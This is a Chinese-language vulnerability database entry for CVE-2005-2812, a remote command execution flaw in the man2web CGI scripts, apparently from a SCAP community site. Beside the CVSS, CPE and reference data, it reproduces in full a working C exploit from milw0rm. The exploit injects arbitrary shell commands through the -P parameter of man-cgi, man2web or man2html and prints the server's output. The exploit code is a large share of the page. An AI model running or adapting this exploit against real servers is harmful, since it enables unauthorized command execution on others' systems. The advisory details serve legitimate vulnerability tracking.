CVE-2005-2812
CVSS7.5
发布时间 :2005-09-07 14:03:00
修订时间 :2008-09-05 16:52:45
NMCOE    

[原文]man2web allows remote attackers to execute arbitrary commands via -P arguments.


[CNNVD]man2web远程命令执行漏洞(CNNVD-200509-048)

        man2web是一种在Web页面上显示手册页的软件。
        man2web在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。man2web的多个脚本没有正确过滤请求中可能包含的恶意数据而直接用来构造调用Shell的命令,攻击者通过嵌入shell命令来获取执行。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:man2web:man2web:0.88
cpe:/a:man2web:man2web:0.87

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2812
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2812
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200509-048
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/14747
(UNKNOWN)  BID  14747

- 漏洞信息

man2web远程命令执行漏洞
高危 输入验证
2005-09-07 00:00:00 2005-10-20 00:00:00
远程  
        man2web是一种在Web页面上显示手册页的软件。
        man2web在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。man2web的多个脚本没有正确过滤请求中可能包含的恶意数据而直接用来构造调用Shell的命令,攻击者通过嵌入shell命令来获取执行。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://man2web.sourceforge.net/

- 漏洞信息 (1194)

man2web <= 0.88 Multiple Remote Command Execution Exploit (update2) (EDBID:1194)
cgi webapps
2005-09-04 Verified
0 tracewar
N/A [点击下载]
/*
 * str0ke@server:~$ ./test some.edu "w" /cgi-bin/man2web 80 1
 * /str0ke
 */
 
 /* dl-mancgi.c v0.2
  * x86/linux multipie man2web cgi-scripts remote command spawn
  * found and coded by tracewar	(darklogic team)		 
  * for educaional purposes only.                                  
  *****************************************************************	
  * greetz goes to:						
  * matan peretz, ofer shaked, setuid, alex, majestic 
  */
 
 
 #include <stdio.h>
 #include <sys/types.h>
 #include <sys/socket.h>
 #include <netinet/in.h>
 #include <netdb.h>
 
 void usage(char *argv0) {
         fprintf(stderr, "x86/linux multipie man2web cgi-scripts remote command spawn\n");
 	fprintf(stderr, "researched by tracewar\n");
 	fprintf(stderr, "targets: \n0=man-cgi\n1=man2web\n2=man2html\n\n");
 	fprintf(stderr, "usage: %s <remote_host> <command> <path> <http server port> <target>\n", argv0);
         fprintf(stderr, "example:");
 	fprintf(stderr, " %s 1.2.3.4 w /cgi-bin/man-cgi 80 0\n",argv0);
         exit(0);
 }
 
 int main(int argc, char **argv) {
         int sock, i, j, len = 0;
         struct sockaddr_in serv_addr;
         struct hostent *crap;
 	char *cp, dummy[50000], buffer[2000] = "GET ";	
         if(argc < 6)
            usage(argv[0]);
 	if(atoi(argv[5]) == 0) {
 			memset(dummy, 0x00, 50000);
 			strcat(dummy, argv[3]);
 			strcat(dummy, "?-P ");
 			strcat(dummy, argv[2]);
 			strcat(dummy, " ls");} 
 	else if(atoi(argv[5]) == 1) {
               		memset(dummy, 0x00, 50000);
              		strcat(dummy, argv[3]);
             	 	strcat(dummy, "?program=-P ");
            	        strcat(dummy, argv[2]);
            	        strcat(dummy, " ls");}
 	else if(atoi(argv[5]) == 2) {
 			memset(dummy, 0x00, 50000);
 			strcat(dummy, argv[3]);
 			strcat(dummy, "?section=-P");
 			strcat(dummy, argv[2]);
 			strcat(dummy, "&topic=w");}
 	else
 		usage(argv[0]);
 
 	printf("# crafting buffer string ... ");
          for(i=0, j=4;i < strlen(dummy);i++) {
 		if(dummy[i] == ' ') {
 			strcat(buffer, "%20");
 			j+=3;}
 		else {
 			buffer[j] = dummy[i];
 			j++;}
 	}
         
 	strcat(buffer, "\r\n");
         printf("(done)\n");
         sock = socket(AF_INET, SOCK_STREAM, 0);
         if(sock < 0)
                 return printf("# error creating socket.\n");
         crap = gethostbyname(argv[1]);
         if(crap == NULL)
                 return printf("# cant resolve the specified hostname: %s\n", argv[1]);
         else
                 printf("# connecting to victim... ");
 
         serv_addr.sin_family = AF_INET;
 	serv_addr.sin_port = htons(atoi(argv[4]));
         bcopy((char *)crap->h_addr, (char *)&serv_addr.sin_addr.s_addr, crap->h_length);
 
         if (connect(sock, &serv_addr, sizeof(serv_addr)) < 0)
                 return printf("(error)\n# check again %s:%d\n", argv[1], atoi(argv[3]));
 
         printf("(done)\n# sending crafted string... ");
         if( (send(sock, buffer, strlen(buffer), 0)) == -1 )
                 return printf("\n# error while sending the crafted string.!\n");
         printf("(done)\n# waiting for our call ...\n");
 	memset(buffer, 0x00, 2000);
 	memset(dummy, 0x00, 50000);
 	printf("\n\n");
 	while(recv(sock, buffer, 2000, 0) > 0)
 		strcat(dummy, buffer);
 
 	cp = &dummy[0];
 	i = 0; j = 0;
 	len = strlen(dummy);
 
         if(atoi(argv[5]) == 0) {
                 while(strncmp(cp, "<hr>", 4) && i < len) {
                         cp++;
                         i++;
                 }
                 cp+=4;
                 while(strncmp(cp, "<hr>", 4) && strncmp(cp, "<A", 2) && j < len) {
 			j++;
                         cp++;
 		}
                 *cp = '\0';
                 cp = &dummy[0] + i + 4;
         }
 
         else if(atoi(argv[5]) == 1) {
                 while(strncmp(cp, "\<pre\>", 5) && i < len) {
                         cp++;
                         i++;
                 }
                 cp+=4;
                 while(strncmp(cp, "pre", 3) && j < len) {
 			j++;
                         cp++;
 		}
                 *cp = '\0';
                 cp = &dummy[0] + i + 6;
         }
 
         else if(atoi(argv[5]) == 2) {
                 while(strncmp(cp, "PRE", 3) && i < len) {
                         cp++;
                         i++;
                 }
                 cp+=2;
                 while(strncmp(cp, "PRE", 3) && j < len) {
 			j++;
                         cp++;
 		}
                 *cp = '\0';
                 cp = &dummy[0] + i + 2;
         }
 
 	if(*cp == '\0')
 		return printf("# Bad response from the server.\n");
 
         printf("%s", cp);
 	printf("\n\n");
         close(sock);
         return 0;
 }

// milw0rm.com [2005-09-04]
		

- 漏洞信息

19515
man2web man2web CGI Arbitrary Command Execution
Exploit Public Vendor Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-09-06 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站